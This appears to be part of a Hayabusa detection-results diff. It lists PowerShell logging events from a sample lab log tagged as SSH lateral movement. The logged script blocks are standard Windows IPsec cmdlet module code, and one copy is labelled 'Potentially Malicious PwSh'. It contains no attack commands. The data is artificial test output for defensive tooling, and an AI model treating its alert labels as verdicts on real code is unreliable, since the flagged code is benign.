($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeSA' -Alias '*' function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeSA' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.833 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.834 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.834 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.834 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.859 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetQuickModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeSA' -Alias '*' function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeSA' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.859 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetQuickModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeSA' -Alias '*' function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeSA' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.860 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.860 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.860 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
